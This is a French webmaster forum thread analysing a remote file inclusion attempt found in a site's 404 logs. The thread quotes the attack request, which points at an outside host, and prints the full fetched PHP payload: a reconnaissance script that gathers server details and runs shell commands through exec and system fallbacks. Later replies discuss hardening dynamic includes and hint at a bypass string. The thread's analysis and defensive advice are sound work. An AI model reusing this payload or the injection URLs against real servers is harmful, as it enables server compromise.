Tentative de piratage...

WRInaute passionné
Je viens d'avoir une erreur 404 bizarre :

Url demandée : /themes/thematique/rubrique/*.php?sel=http://72.29.86.131/~thedaemo/infect.jpg?
Navigateur utilisé : libwww-perl/5.79
Méthode utilisée : GET
Nom de Domaine : ns1.oatl.net
IP du visiteur : 72.35.73.2

J'ai été voir cette adresse : -http://72.29.86.131/~thedaemo/infect.jpg?

Voici le contenu du code source :


Code:
<?
$dir = @getcwd();
$ker = @php_uname();
echo "By Blu3H4".(5+2);

$OS = @PHP_OS;
 $IpServer = $_SERVER["SERVER_ADDR"];
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = "$SafeMode"; }
 
echo "<br> blu3start Server_IP: {$IpServer} __ System:{$OS} __ Uname: {$UNAME} __ PHP: {$PHPv} __ safe mode: {$SafeMode} blu3end";



echo "Blu3H47<br>";

$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 


?>

Qu'est-ce que cela essaye de faire exactement ??
 
WRInaute impliqué
je me demande bien de quelle faille de quel cms il essaye d'exploiter...sinon après il pourrait faire bien pire, là il semble se contenter de collecter un max d'info sur le serveur
 
WRInaute passionné
medium69 a dit:
Qu'est-ce que cela essaye de faire exactement ??
Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.
 
WRInaute accro
Serious a dit:
medium69 a dit:
Qu'est-ce que cela essaye de faire exactement ??
Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.
ben, "Injection de code PHP", je crois que si, on peut parler de tentative de piratage
 
WRInaute accro
Serious a dit:
medium69 a dit:
Qu'est-ce que cela essaye de faire exactement ??
Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.

ensuite c'est ce script qui entre en jeux via une faille include par exemple : -http://72.29.86.131/~thedaemo/tool25.dat
 
WRInaute passionné
Leonick a dit:
Serious a dit:
medium69 a dit:
Qu'est-ce que cela essaye de faire exactement ??
Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.
ben, "Injection de code PHP", je crois que si, on peut parler de tentative de piratage

J'ai créer un fichier avec le script et c'est vrai que sil il passe, il à tout un tas d'infos sur le serveur où se trouve le site...

Heureusement que ça n'est pas passé ;)

D'ailleurs je vais sécuriser un peu plus...
 
WRInaute impliqué
d'un autre coté le gars qui évalue ou qui inclue un fichier provenant d'un paramêtre GET/POST/COOKIE faut pas qu'il vienne pleurer qu'il s'est fait hacker ensuite lol
 
WRInaute impliqué
Sauf si l'include via le GET est "securisé". Pour mon site, j'appelle des fichiers en inculde via un GET, mais ma commande est du genre
include ("partie_fixe_$ma_variable").
Tu auras beau tenter d'inclure un fichier distant via le GET le serveur ne trouvera jamais le fichier ;)

P.S :
Ou alors s'il y a malgré tout une faille, donnez la moi que je sécurise de suite.
 
WRInaute impliqué
Djoule_logo a dit:
Sauf si l'include via le GET est "securisé". Pour mon site, j'appelle des fichiers en inculde via un GET, mais ma commande est du genre
include ("partie_fixe_$ma_variable").
Tu auras beau tenter d'inclure un fichier distant via le GET le serveur ne trouvera jamais le fichier ;)

P.S :
Ou alors s'il y a malgré tout une faille, donnez la moi que je sécurise de suite.

Ah oui et si il y a un brute force pour trouver ta partie fixe tu es eu, il te faut faire une condition avec filexist

Exemple :
Code:
if(isset($_GET['ma_variable']) AND file_exists("partie_fixe_$ma_variable")
 
WRInaute impliqué
D'une manière générale y a toujours moyen de faire autrement qu'un include dynamique comme par exemple utiliser des fonctions, des templates, etc
 
WRInaute accro
Djoule_logo a dit:
Sauf si l'include via le GET est "securisé". Pour mon site, j'appelle des fichiers en inculde via un GET, mais ma commande est du genre
include ("partie_fixe_$ma_variable").
Tu auras beau tenter d'inclure un fichier distant via le GET le serveur ne trouvera jamais le fichier ;)

P.S :
Ou alors s'il y a malgré tout une faille, donnez la moi que je sécurise de suite.

Bonne option, mais je me suis toujours demandé s'il n'y avais pas moyen de faire sauter la partie fixe avec des caractères spéciaux au niveau de la mémoire (genre backslash)

Pas moyen de tester chez moi non plus ...

sinon je me souviens d'il y pas si longtemps (j'étudiais justement cette faille) ou tu trouvais facilement un serveur sensible avec GG
 
WRInaute impliqué
f_trt a dit:
Djoule_logo a dit:
Sauf si l'include via le GET est "securisé". Pour mon site, j'appelle des fichiers en inculde via un GET, mais ma commande est du genre
include ("partie_fixe_$ma_variable").
Tu auras beau tenter d'inclure un fichier distant via le GET le serveur ne trouvera jamais le fichier ;)

P.S :
Ou alors s'il y a malgré tout une faille, donnez la moi que je sécurise de suite.

Ah oui et si il y a un brute force pour trouver ta partie fixe tu es eu, il te faut faire une condition avec filexist

Exemple :
Code:
if(isset($_GET['ma_variable']) AND file_exists("partie_fixe_$ma_variable")

je pense pas qu'on puisse faire quoique ce soit même en connaissant la partie fixe, mais je vais appliquer le principe de précaution et le file_exist ;)
 
WRInaute passionné
Ce n'est pas encore suffisant meme si ca rend les choses legerement plus difficiles. Tu as essaye avec ':x@crack.com/' ? Je ne pense pas.
Il est tres difficile de securiser un include distant. Et meme si tu y arrives, ca n'enlevera pas le fait que la securite de ton serveur depend de celle du serveur distant.
 
Discussions similaires
Haut